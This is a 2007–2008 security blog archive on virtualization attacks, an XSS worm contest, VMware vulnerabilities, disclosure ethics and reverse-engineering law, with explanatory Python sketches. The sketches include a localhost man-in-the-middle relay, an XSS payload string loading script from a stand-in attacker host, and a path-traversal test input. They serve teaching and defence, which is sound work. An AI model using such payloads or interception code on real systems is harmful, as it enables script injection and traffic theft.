PLEASE NOTE: I HAVE PERMANENTLY MOVED MY BLOG TO http://www.rationalsurvivability.com/blog

February 26, 2008

The virtualization security (VirtSec) FUD meter is in overdrive this week...

Part I: So, I was at a conference a couple of weeks ago. I sat in on a lot of talks. Some of them had demos. What amazed me about these demos is that in many cases, in order for the attacks to work, it was disclosed that the attack target was configured by a monkey with all defaults enabled and no security controls in place. "...of course, if you checked this one box, the exploit doesn't work..." *gulp*

Part II: We've observed a lot of interesting PoC attack demonstrations, such as those at shows, being picked up by the press and covered in blogs. Many of these stories simply ham it up for the sensational title. Some of the artistic license and inaccuracies are just plain recockulous. That's right: there's ridiculous, and then there's recockulous.

Example: Here's an excerpt from an article detailing the PoC attack/code that Jon Oberheide used to show how, if you don't follow VMware's (and the CIS benchmark's) recommendations for securing your VMotion network, you might be susceptible to interception of traffic and other bad things, since -- as VMware clearly states -- VMotion traffic (and machine state) is sent in the clear.

This was demonstrated at BlackHat DC and here's how the article portrayed it:

Jon Oberheide, a researcher and PhD candidate at the University of Michigan, is releasing a proof-of-concept tool called Xensploit that lets an attacker take over the VM’s hypervisor and applications, and grab sensitive data from the live VMs.

Really? Take over the hypervisor, eh? Hmmmm. That sounds super-serious! Oh, the humanity!

However, here's how the VMTN blog rationally describes the situation in a measured response that does it better than I could:

Recently a researcher published a proof-of-concept called Xensploit which allows an attacker to view or manipulate a VM undergoing live migration (i.e. VMware’s VMotion) from one server to another. This was shown to work with both VMware’s and Xen’s version of live migration. Although impressive, this work by no means represents any new security risk in the datacenter. It should be emphasized this proof-of-concept does NOT “take over the hypervisor” nor present unencrypted traffic as a vulnerability needing patching, as some news reports incorrectly assert. Rather, it is a reminder of how an already-compromised network, if left unchecked, could be used to stage additional severe attacks in any environment, virtual or physical. ...

Encryption of all data-in-transit is certainly one well-understood mitigation for man-in-the-middle attacks. But the fact that plenty of data flows unencrypted within the enterprise -- indeed perhaps the majority of data -- suggests that there are other adequate mitigations. Unencrypted VMotion traffic is not a flaw, but allowing VMotion to occur on a compromised network can be. So this is a good time to re-emphasize hardening best practices for VMware Infrastructure and what benefit they serve in this scenario.
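Xensploit itself isn't reproduced here, but the underlying point -- cleartext on a compromised segment is readable by whoever sits in the path -- can be sketched with a toy TCP relay. Everything below (ports, the "guest memory" payload) is made up for illustration; it is a sketch of passive interception, not of the actual tool:

```python
import socket
import threading

captured = []  # bytes observed by the "attacker" in the middle

def make_listener(port):
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    return srv

dest_srv = make_listener(9102)   # stands in for the migration destination host
mitm_srv = make_listener(9101)   # the attacker's relay on a compromised segment

def run_destination():
    # The destination just drains whatever the "migration" sends it.
    conn, _ = dest_srv.accept()
    while conn.recv(4096):
        pass
    conn.close()
    dest_srv.close()

def run_relay():
    # Forward traffic unmodified, but record every byte: with no
    # encryption on the wire, passive interception is this simple.
    conn, _ = mitm_srv.accept()
    out = socket.create_connection(("127.0.0.1", 9102))
    while True:
        data = conn.recv(4096)
        if not data:
            break
        captured.append(data)
        out.sendall(data)
    out.close()
    conn.close()
    mitm_srv.close()

threads = [threading.Thread(target=run_destination),
           threading.Thread(target=run_relay)]
for t in threads:
    t.start()

# The "migration" source sends guest state in the clear through the relay.
src = socket.create_connection(("127.0.0.1", 9101))
src.sendall(b"GUEST-MEMORY-PAGE: page tables, session keys, ...")
src.close()
for t in threads:
    t.join()

print(b"".join(captured).decode())
```

Note that the relay never has to break anything: it only has to be in the path, which is exactly why the mitigation is isolating (or encrypting) the migration network rather than patching the product.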

I'm going to give you one guess as to why this traffic is unencrypted...see if you can guess right in the comments.

Now, I will concede that this sort of thing represents a new risk in the datacenter if you happen to not pay attention to what you're doing, but I think Jon's PoC is a great example of why you should follow both common-sense security hardening recommendations and NOT BELIEVE EVERYTHING YOU READ.

The diminutive XSS worm replication contest is a week long contest to get some good samples of the smallest amount of code necessary for XSS worm propagation. I’m not interested in payloads for this contest, but rather, the actual methods of propagation themselves. We’ve seen the live worm code and all of it is muddied by obfuscation, individual site issues, and the payload itself. I’d rather think cleanly about the most efficient method for propagation where every character matters.
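For context on the mechanics being discussed: propagation of this kind rides on a site echoing user-supplied input back into a page without encoding it. A minimal sketch of that vulnerable pattern, and of the output encoding that neutralizes it (the payload string is inert and invented for illustration):

```python
import html

# An inert stand-in for a propagation vector: user input that, if echoed
# back into a page verbatim, would load and run attacker script.
payload = '<script src="http://attacker.invalid/w.js"></script>'

def render_comment_unsafe(comment):
    # The vulnerable pattern worms depend on: input interpolated into HTML.
    return "<div class='comment'>%s</div>" % comment

def render_comment_safe(comment):
    # Output encoding turns the markup into harmless text, so the
    # "worm" is displayed rather than executed.
    return "<div class='comment'>%s</div>" % html.escape(comment)

print(render_comment_unsafe(payload))
print(render_comment_safe(payload))
```

The entire class of worm depends on the first function; the second one, applied consistently, is what breaks propagation regardless of how few characters the payload needs.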

yes, folks... robert hansen (aka rsnake), the founder and ceo of sectheory, felt it would be a good idea to hold a contest to see who could create the smallest xss worm... ok, so there's no money changing hands this time, but that doesn't mean the winner isn't getting rewarded - there are absolutely rewards to be had for the winner of a contest like this and that's a big problem because lots of people want rewards and this kind of contest will make people think about and create xss worms when they wouldn't have before...

Here's where Kurt diverges from simply highlighting nominal arguments of the potential for
misuse of the contest derivatives. He suggests that RSnake is being
unethical and is encouraging this contest not for academic purposes, but rather to reap personal gain from it:

would you trust your security to a person who makes or made malware? how about a person or company that intentionally motivates others to do so? why do you suppose the anti-virus industry works so hard to fight the conspiracy theories that suggest they are the cause of the viruses? at the very least mr. hansen is playing fast and loose with the public's trust and ultimately harming security in the process, but there's a more insidious angle too...

while the worms he's soliciting from others are supposed to be merely proof of concept, the fact of the matter is that proof of concept worms can still cause problems (the recent orkut worm was a proof of concept)... moreover, although the winner of the contest doesn't get any money, at the end of the day there will almost certainly be a windfall for mr. hansen - after all, what do you suppose happens when you're one of the few experts on some relatively obscure type of threat and that threat is artificially made more popular? well, demand for your services goes up of course... this is precisely the type of shady marketing model i described before where the people who stand to gain the most out of a problem becoming worse directly contribute to that problem becoming worse... it made greg hoglund and jamie butler household names in security circles, and it made john mcafee (pariah though he may be) a millionaire...

I think the following exchange in the comments section of the contest forum offers an interesting position from RSnake's perspective:

@Gareth Heyes - perhaps, but trouble is my middle name. So is danger. Actually I have like 40 middle names it turns out. ;) No, I'm not worried, this is academic - it won't work anywhere without modification of variables, and has no payload. The goal is to understand worm propagation and get to the underlying important pieces of code.

I'm not in the UK and am not a lawyer so I can't comment on the laws. I'm not suggesting anyone should try to weaponize the code (they could already do that with the existing worm code if they wanted anyway).

So, we've got Wismer's perspective and (indirectly) RSnake's.

What's yours? Do you think holding a contest to build a PoC for a worm is a good idea? Do the benefits of research and understanding the potential attacks so one can defend against them outweigh the potential for malicious use? Do you think there are, or will be, legal ramifications from these sorts of activities?

September 21, 2007

By now you've no doubt heard that Ryan Smith and Neel Mehta from IBM/ISS X-Force have discovered vulnerabilities in VMware's DHCP implementation that could allow for "...specially crafted packets to gain system-level privileges" and allow an attacker to execute arbitrary code on the system with elevated privileges thereby gaining control of the system.

Further, Dark Reading details that Rafal Wojtczuk (whose last name's spelling is a vulnerability in and of itself!) from McAfee discovered the following vulnerability:

A vulnerability that could allow a guest operating system user with administrative privileges to cause memory corruption in a host process, and potentially execute arbitrary code on the host. Another fix addresses a denial-of-service vulnerability that could allow a guest operating system to cause a host process to become unresponsive or crash.

...and yet another from the Goodfellas Security Research Team:

An additional update, according to the advisory, addresses a security vulnerability that could allow a remote hacker to exploit the library file IntraProcessLogging.dll to overwrite files in a system. It also fixes a similar bug in the library file vielib.dll.

It is important to note that these vulnerabilities had been mitigated by VMware by the time of this announcement. Further information regarding mitigation of all of these vulnerabilities can be found here.

You can find details regarding these vulnerabilities via the National Vulnerability Database here:

CVE-2007-4496 - Unspecified vulnerability in EMC VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and ACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528 allows authenticated users with administrative privileges on a guest operating system to corrupt memory and possibly execute arbitrary code on the host operating system via unspecified vectors.

CVE-2007-4155 - Absolute path traversal vulnerability in a certain ActiveX control in vielib.dll in EMC VMware 6.0.0 allows remote attackers to execute arbitrary local programs via a full pathname in the first two arguments to the (1) CreateProcess or (2) CreateProcessEx method.
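The advisory doesn't include the fix, but the class of bug in CVE-2007-4155 (an exposed method that launches whatever full pathname the caller supplies) has a well-understood countermeasure: canonicalize and allowlist before spawning anything. A generic sketch, with hypothetical directory and program names:

```python
import os.path

# Hypothetical policy: the only binary an exposed "launch" method may start.
ALLOWED_DIR = "/opt/vendor/bin"
ALLOWED_PROGRAMS = {"helper"}

def validate_program_path(requested):
    # Canonicalize first, so ".." segments and symlinks collapse before
    # the check; then require an exact directory and program-name match.
    real = os.path.realpath(requested)
    directory, name = os.path.split(real)
    if directory != ALLOWED_DIR or name not in ALLOWED_PROGRAMS:
        raise PermissionError("refusing to launch %r" % requested)
    return real

print(validate_program_path("/opt/vendor/bin/helper"))
try:
    validate_program_path("/opt/vendor/bin/../../../Windows/System32/cmd.exe")
except PermissionError as exc:
    print("blocked:", exc)
```

The key design point is that the check happens on the canonicalized path, not the caller-supplied string; checking the raw string is exactly what path traversal defeats.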

I am happy to see that VMware moved on these vulnerabilities (I do not have the timeframe of this disclosure and mitigation available.) I am convinced that their security team and product managers truly take this sort of thing seriously.

However, this just goes to show that as virtualization platforms push further into mainstream adoption, exploitable vulnerabilities will continue to follow as those who follow the money pick up the scent.

This is another phrase that's going to make me a victim of my own Captain Obvious Award, but it seems like we've been fighting this premise for too long now. I recognize that this is not the first set of security vulnerabilities we've seen from VMware, but I'm going to highlight them for a reason.

With few well-articulated vulnerabilities extending beyond theoretical assertions or PoCs, it seems the sensationalism of research such as Blue Pill has desensitized folks to the emerging realities of virtualization platform attack surfaces.

I've blogged about this over the last year and a half, with the latest found here and an interview here. It's really just an awareness campaign. One I'm more than willing to wage given the stakes. If that makes me the noisy canary in the coal mine, so be it.

These very real examples are why I feel it's ludicrous to take seriously any comments that suggest by generalization that virtualized environments are "more secure" by design; it's software, just like anything else, and it's going to be vulnerable.

I'm not trying to signal that the sky is falling, just the opposite. I do, however, want to make sure we bring these issues to your attention.

July 25, 2007

Listen, I'm a renaissance man and I look for analogs to the security space anywhere and everywhere I can find them.

I maintain that next to the iPhone, this is the biggest thing to hit the security world since David Maynor found Jesus (in a pool hall, no less.)

I believe InfoSec Sellout already has produced a zero-day for this using real worms. No Apple products were harmed during the production of this webserver, but I am sad to announce that there is no potential for adding your own apps to the KermitOS...an SDK is available, however.

The frog's dead. Suspended in a liquid. In a Jar. Connected to the network via an Ethernet cable. You can connect to the embedded webserver wired into its body parts. When you do this, you control which one of its legs twitch. pwned!

The Experiments in Galvanism frog floats in mineral oil, a webserver installed in its guts, with wires into its muscle groups. You can access the frog over the network and send it galvanic signals that get it to kick its limbs.

Experiments in Galvanism is the culmination of studio and gallery experiments in which a miniature computer is implanted into the dead body of a frog specimen. Akin to Damien Hirst's bodies in formaldehyde, the frog is suspended in clear liquid contained in a glass cube, with a blue ethernet cable leading into its splayed abdomen. The computer stores a website that enables users to trigger physical movement in the corpse: the resulting movement can be seen in gallery, and through a live streaming webcamera.
- Risa Horowitz

Garnet Hertz has implanted a miniature webserver in the body of a frog specimen, which is suspended in a clear glass container of mineral oil, an inert liquid that does not conduct electricity. The frog is viewable on the Internet, and on the computer monitor across the room, through a webcam placed on the wall of the gallery. Through an Ethernet cable connected to the embedded webserver, remote viewers can trigger movement in either the right or left leg of the frog, thereby updating Luigi Galvani's original 1786 experiment causing the legs of a dead frog to twitch simply by touching muscles and nerves with metal.

Experiments in Galvanism is both a reference to the origins of electricity, one of the earliest new media, and, through Galvani's discovery that bioelectric forces exist within living tissue, a nod to what many theorists and practitioners consider to be the new new media: bio(tech) art.
- Sarah Cook and Steve Dietz

Good, bad or indifferent, one would be blind not to recognize that these services are changing the landscape of vulnerability research and pushing the limits which define "responsible disclosure."

It was only a matter of time until we saw the mainstream commercial emergence of the open vulnerability auction which is just another play on the already contentious marketing efforts blurring the lines between responsible disclosure for purely "altruistic" reasons versus commercial gain.

This auction marketplace for vulnerabilities is marketed as a Swiss "...Laboratory & Marketplace Platform for Information Technology Security" which "...helps customers defend their databases, IT infrastructure, network, computers, applications, Internet offerings and access."

Despite a name which sounds like Mushmouth from Fat Albert created it (it's Japanese in origin, according to the website) I am intrigued by this concept and whether or not it will take off.

I am, however, a little unclear on how customers are able to purchase a vulnerability and then become more secure in defending their assets.

A vulnerability without an exploit, some might suggest, is not a vulnerability at all -- or at least it poses little temporal risk. This is a fundamental debate of the definition of a Zero-Day vulnerability.

Further, a vulnerability that has a corresponding exploit but no countermeasure (patch, signature, etc.) is potentially just as useless to customers if they have no way of protecting themselves.

If you can't manufacture a countermeasure, even if you hoard the vulnerability and/or exploit, how is that protection? I suggest it's just delaying the inevitable.

I am wondering how long until we see the corresponding auctioning off of the exploit and/or countermeasure? Perhaps by the same party that purchased the vulnerability in the first place?

Today, in the closed-loop subscription services offered by vendors who buy vulnerabilities, the subscribing customer gets the benefit of protection against a threat they may not even know they have. But for those who can't or won't pony up the money for this sort of subscription (which is usually tied to owning a corresponding piece of hardware to enforce it), there exists a window between when the vulnerability is published and when this knowledge is made available universally.

Depending upon this delta, these services may be doing more harm than good to the greater populace.

In fact, Dave G. over at Matasano argues quite rightly that by publishing even the basic details of a vulnerability, "researchers" will be able to more efficiently locate the chunks of code wherein the vulnerability exists and release this information publicly -- code that was previously not even known to have a vulnerability.
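Dave G.'s point is easy to see mechanically: even a vague advisory narrows the search from "the whole product" to "this subsystem, this bug class." A toy illustration (the file names and C snippets below are invented):

```python
import re

# A toy "codebase": one file contains the classically unbounded call that a
# vague advisory ("memory corruption while parsing options") points toward.
codebase = {
    "dhcp_options.c": """
        void parse_option(char *dst, const char *src) {
            strcpy(dst, src);   /* no length check */
        }
    """,
    "lease_db.c": """
        void store_lease(char *name, size_t n, const char *raw) {
            snprintf(name, n, "%s", raw);
        }
    """,
}

RISKY = re.compile(r"\b(strcpy|strcat|sprintf|gets)\s*\(")

def triage(files):
    # Even a one-line disclosure shrinks the haystack: scan the named
    # subsystem for the usual unbounded string functions.
    hits = []
    for fname, src in files.items():
        for call in RISKY.findall(src):
            hits.append((fname, call))
    return hits

print(triage(codebase))
```

Real vulnerability rediscovery uses far more sophisticated tooling (patch diffing, static analysis), but the economics are the same: each published detail multiplies the efficiency of everyone hunting, friendly or not.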

Each of these example vulnerability service offerings describes how the vulnerabilities are kept away from the "bad guys" by qualifying buyers' intentions based upon their ability to pay for access to the malicious code (we all know that criminals are poor, right?). Here's what the Malware Distribution Project describes as the gatekeeper function:

Why Pay?

Easy; it keeps most, if not all of the malicious intent, outside the gates. While we understand that it may be frustrating to some people with the right intentions not allowed access to MD:Pro, you have to remember that there are a lot of people out there who want to get access to malware for malicious purposes. You can't be responsible on one hand, and give open access to everybody on the other, knowing that there will be people with expressly malicious intentions in that group.

ZDI suggests that by not reselling the vulnerabilities but rather protecting their customers and ultimately releasing the code to other vendors, they are giving back:

The Zero Day Initiative (ZDI) is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com later provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

As if you haven't caught on yet, it's all about the Benjamins.

We've seen the arguments ensue regarding third party patching. I think that this segment will heat up because in many cases it's going to be the fastest route to protecting oneself from these rapidly emerging vulnerabilities you didn't know you had.

June 19, 2007

In this first installment of Take5, I interview Chris Wysopal, the CTO of Veracode about his new company, secure coding, vulnerability research and the recent forays into application security by IBM and HP.

This entire interview was actually piped over a point-to-point TCP/IP connection using command-line redirection through netcat. No packets were harmed during the making of this interview...
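For anyone who hasn't played with netcat: the joke maps onto a real pattern, one endpoint listening and one connecting, with text shoveled down the pipe in both directions. The in-process equivalent is a connected socket pair (the question and answer strings below are invented):

```python
import socket

# A connected socket pair is the in-process stand-in for two netcat
# endpoints wired together: each side writes its half of the "interview"
# down the pipe and reads the other side's bytes back out.
interviewer, interviewee = socket.socketpair()

interviewer.sendall(b"1) What does Veracode analyze?\n")
question = interviewee.recv(4096)

interviewee.sendall(b"Binary static analysis of C/C++ and Java apps.\n")
answer = interviewer.recv(4096)

print(question.decode(), answer.decode(), sep="", end="")

interviewer.close()
interviewee.close()
```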

First, a little background on the victim, Chris Wysopal:

Chris Wysopal is co-founder and CTO of Veracode. He has testified on Capitol Hill on the subjects of government computer security and how vulnerabilities are discovered in software. Chris co-authored the password auditing tool L0phtCrack, wrote the Windows version of netcat, and was a researcher at the security think tank, L0pht Heavy Industries, which was acquired by @stake. He was VP of R&D at @stake and later director of development at Symantec, where he led a team developing binary static analysis technology.

He was influential in the creation of responsible vulnerability disclosure guidelines and a founder of the Organization for Internet Safety. Chris wrote "The Art of Software Security Testing: Identifying Security Flaws", published by Addison Wesley and Symantec Press in December 2006. He earned his Bachelor of Science degree in Computer and Systems Engineering from Rensselaer Polytechnic Institute.

1) You’re a founder of Veracode, which is described as the industry’s first provider of automated, on-demand application security solutions. What sort of application security services does Veracode provide? Binary analysis? Web apps?

Veracode currently offers binary static analysis of C/C++ applications for Windows and Solaris and for Java applications. This allows us to find the classes of vulnerabilities that source code analysis tools can find, but on the entire codebase, including the libraries which you probably don't have source code for. Our product roadmap includes support for C/C++ on Linux and C# on .Net. We will also be adding additional analysis techniques to our flagship binary static analysis.

2) Is this a SaaS model? How do you charge for your services? Do you see manufacturers using your services, or enterprises?

Yes. Customers upload their binaries to us and we deliver an analysis of their security flaws via our web portal. We charge by the megabyte of code. We have both software vendors and enterprises who write or outsource their own custom software using our services. We also have enterprises who are purchasing software ask the software vendors to submit their binaries to us for a 3rd party analysis. They use this analysis as a factor in their purchasing decision. It can lead to a "go/no go" decision, a promise by the vendor to remediate the issues found, or a reduction in price to compensate for the cost of additional controls or the cost of incident response that insecure software necessitates.

3) I was a Qualys customer -- a VA/VM SaaS company. Qualys had to spend quite a bit of time convincing customers that allowing for the storage of their VA data was secure. How does Veracode address a customer’s security concerns when uploading their applications?

We are absolutely fanatical about the security of our customers' data. I look back at the days when I was a security consultant, where we had vulnerability data on laptops and corporate file shares, and I say, "what were we thinking?" All customer data at Veracode is encrypted in storage and at rest with a unique key per application and customer. Everyone at Veracode uses 2 factor authentication to log in and 2 factor is the default for customers. Our data center is a SAS 70 Type II facility. All data access is logged so we know exactly who looked at what and when. As security people we are professionally paranoid and I think it shows through in the system we built. We also believe in 3rd party verification, so we have had a top security boutique do a security review of our portal application.
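Wysopal doesn't describe the mechanics behind "a unique key per application and customer," but one common way to get that property is to derive each data key from a master key plus tenant identifiers rather than storing thousands of independent keys. A minimal sketch under that assumption (the customer and application names are invented):

```python
import hashlib
import hmac
import secrets

# A master key like this would live in an HSM or key-management service.
MASTER_KEY = secrets.token_bytes(32)

def derive_data_key(customer_id, application_id):
    # Deterministically derive a per-(customer, application) data key from
    # the master key, so no two tenants ever share an encryption key and a
    # compromise of one key exposes only one application's data.
    context = ("%s|%s" % (customer_id, application_id)).encode()
    return hmac.new(MASTER_KEY, context, hashlib.sha256).digest()

k1 = derive_data_key("acme", "billing-app")
k2 = derive_data_key("acme", "hr-app")
k3 = derive_data_key("globex", "billing-app")

assert len({k1, k2, k3}) == 3                          # unique per pair
assert k1 == derive_data_key("acme", "billing-app")    # reproducible
print("derived", len({k1, k2, k3}), "distinct 256-bit keys")
```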

4) With IBM’s acquisition of Watchfire and today’s announcement that HP will buy SPI Dynamics, how does Veracode stand to play in this market of giants who will be competing to drive service revenues?

We have designed our solution from the ground up to have the Web 2.0 ease of use and experience, and we have the quality of analysis that I feel is the best in the market today. An advantage is Veracode is an independent assessment company that customers can trust not to play favorites to other software companies because of partnerships or alliances. Would Moody's or Consumer Reports be trusted as a 3rd party if they were part of a big financial or technology conglomerate? We feel a 3rd party assessment is important in the security world.

5) Do you see the latest developments in vulnerability research, with the drive for pay-for-zero-day initiatives, pressuring developers to produce secure code out of the box for fear of exploit, or is it driving the activity to companies like yours?

I think the real driver for developers to produce secure code, and for developers and customers to seek code assessments, is the reality that the cost of insecure code goes up every day, and it's adding to the operational risk of companies that use software. People exploiting vulnerabilities are not going away, and there is no way to police the internet of vulnerability information. The only solution is for customers to demand more secure code, and proof of it, and for developers to deliver more secure code in response.

June 14, 2007

In May I blogged what I thought was an interesting question regarding the legality and liability of reverse engineering in security vulnerability research. That discussion focused on the reverse engineering and vulnerability research of hardware and software products that were performed locally.

I continued with a follow-on discussion that extended the topic to include security vulnerability research from the web-based perspective; I was interested to see how different the opinions on legality and liability were among many of the top security researchers as they relate to local versus remote vulnerability research and disclosure.

As part of the last post, I made reference to a working group organized by CSI whose focus and charter were to discuss web security research law. This group is made up of some really smart people and I was looking forward to the conclusions reached by them on the topic and what might be done to potentially solve the obvious mounting problems associated with vulnerability research and disclosure.

Unfortunately, the conclusions of the working group are an indictment of the sad state of affairs related to the security space, and further underscore the sense of utter hopelessness many in the security community experience.

What the group concluded after 14 extremely interesting and well-written pages was absolutely nothing:

The meeting of minds that took place over the past two months advanced the group's collective knowledge on the issue of Web security research law. Yet if one assumed that the discussion advanced the group's collective understanding of this issue, one might be mistaken.

Informative though the work was, it raised more questions than answers. In the pursuit of clarity, we found, instead, turbidity.

Thus it follows, that there are many opportunities for further thought, further discussion, further research and further stirring up of murky depths. In the short term, the working group has plans to pursue the following endeavors:

Creating disclosure policy guidelines -- both to help site owners write disclosure policies, and for security researchers to understand them.

Creating guidelines for creating a "dummy" site.

Creating a more complete matrix of Web vulnerability research methods, written with the purpose of helping attorneys, lawmakers and law enforcement officers understand the varying degrees of invasiveness.

Jeremiah Grossman, a friend and one of the working group members summarized the report and concluded with the following: "...maybe within the next 3-5 years as more incidents like TJX occur, we’ll have both remedies." Swell.

Please don't misunderstand my cynical tone and disappointment as a reflection on any of the folks who participated in this working group -- many of whom I know and respect. It is, however, sadly another example of the hamster wheel of pain we're all on when the best and brightest we have can't draw meaningful conclusions against issues such as this.

I was really hoping we'd be further down the path towards getting our arms around the problem so we could present meaningful solutions that would make a dent in the space. Unfortunately, I think where we are is the collective shoulder-shrug shrine of cynicism perched perilously on the cliff overlooking the chasm of despair, which drops off into the trough of disillusionment.

June 10, 2007

I posited the potential risks of vulnerability research in this blog entry here. Specifically I asked about reverse engineering and implications related to IP law/trademark/copyright, but the focus was ultimately on the liabilities of the researchers engaging in such activities.

Admittedly I'm not a lawyer and my understanding of some of the legal and ethical dynamics is amateur at best, but what was very interesting to me was the breadth of the replies from both the on- and off-line responses to my request for opinion on the matter.

I was contacted by white, gray and blackhats regarding this meme and the results were divergent across legal, political and ideological lines.

KJH (Kelly Jackson Higgins -- hey, Kel!) from Dark Reading recently posted an interesting collateral piece titled "Laws Threaten Security Researchers" in which she outlines the results of a CSI working group chartered to investigate and explore the implications that existing and pending legislation would have on vulnerability research and those who conduct it. Folks like Jeremiah Grossman (who comments on this very story, here) and Billy Hoffman participate on this panel.

What is interesting is the contrast in commentary between how folks responded to my post versus these comments based upon the CSI working group's findings:

In the report, some Web researchers say that even if they find a bug accidentally on a site, they are hesitant to disclose it to the Website's owner for fear of prosecution. "This opinion grew stronger the more they learned during dialogue with working group members from the Department of Justice," the report says.

I believe we've all seen the results of some overly-litigious responses on behalf of companies against whom disclosures related to their products or services have been released -- for good or bad.

Ask someone like Dave Maynor if the pain is ultimately worth it. Depending upon your disposition, your mileage may vary.

That revelation is unnerving to Jeremiah Grossman, CTO and founder of WhiteHat Security and a member of the working group. "That means only people that are on the side of the consumer are being silenced for fear of prosecution," and not the bad guys.

...

"[Web] researchers are terrified about what they can and can't do, and whether they'll face jail or fines," says Sara Peters, CSI editor and author of the report. "Having the perspective of legal people and law enforcement has been incredibly valuable. [And] this is more complicated than we thought."

This sort of response didn't come across that way at all from folks who both privately or publicly responded to my blog; most responses were just the opposite, stated with somewhat of a sense of entitlement and immunity. I expect to query those same folks again on the topic.

Check this out:

The report discusses several methods of Web research, such as gathering information off-site about a Website or via social engineering; testing for cross-site scripting by sending HTML mail from the site to the researcher's own Webmail account; purposely causing errors on the site; and conducting port scans and vulnerability scans.

Interestingly, DOJ representatives say that using just one of these methods might not be enough for a solid case against a [good or bad] hacker. It would take several of these activities, as well as evidence that the researcher tried to "cover his tracks," they say. And other factors -- such as whether the researcher discloses a vulnerability, writes an exploit, or tries to sell the bug -- may factor in as well, according to the report.

Full disclosure and to whom you disclose it and when could mean the difference between time in the spotlight or time in the pokey!

May 08, 2007

(Ed.: Wow, some really great comments came out of this question. I did a crappy job framing the query, but there exists a cohesiveness to both the comments and private emails I have received that shows there is confusion in both the terminology and execution of reverse engineering.

I suppose the entire issue of reverse engineering legality can just be washed away by what appeared to me as logical and what I stated in the first place -- there is no implied violation of an EULA or IP if one didn't agree to it in the first place (duh!) -- but I wanted to make sure that my supposition was correct.)

I have a question that hopefully someone can answer for me in a straightforward manner. It popped into my mind yesterday in an unrelated matter and perhaps it's one of those obvious questions, but I'm not convinced I've ever seen an obvious answer.

If I, as an individual or as a representative of a company that performs vulnerability research and assurance, engage in reverse engineering of a product that is covered by patent/IP protection and/or EULAs that expressly forbid reverse engineering, how would I deflect liability for violating these tenets if I disclose that I have indeed engaged in reverse engineering?

HID and Cisco have both shown that when backed into a corner, they will litigate, and the researcher and/or company is forced to either back down or defend (usually the former). (Ed.: These are poor examples, as they do not really fall into the same camp as the example I give below.)

Do you folks who do this for a living (or own/manage a company that does) simply count on the understanding that if one can show "purity" of non-malicious motivation that nothing bad will occur?

It's painfully clear that the slippery slope of full disclosure plays into this, but help me understand how the principle of the act (finding a vulnerability and telling the company/world about it) outweighs the liability involved.

Do people argue that if you don't purchase the equipment you're not covered under the EULA? I'm trying to rationalize this. How does one side-step the law in these cases without playing Russian Roulette?

Here's an example of what I mean. If you watch this video, the researchers that demonstrated the Cisco NAC attack @ Black Hat clearly articulate the methods they used to reverse engineer Cisco's products.

I'm not looking for a debate on the up/downside of full disclosure, but more specifically the mechanics of the process used to identify that a vulnerability exists in the first place -- especially if reverse engineering is used.

Perhaps this is a naive question or an uncomfortable one to answer, but I'm really interested.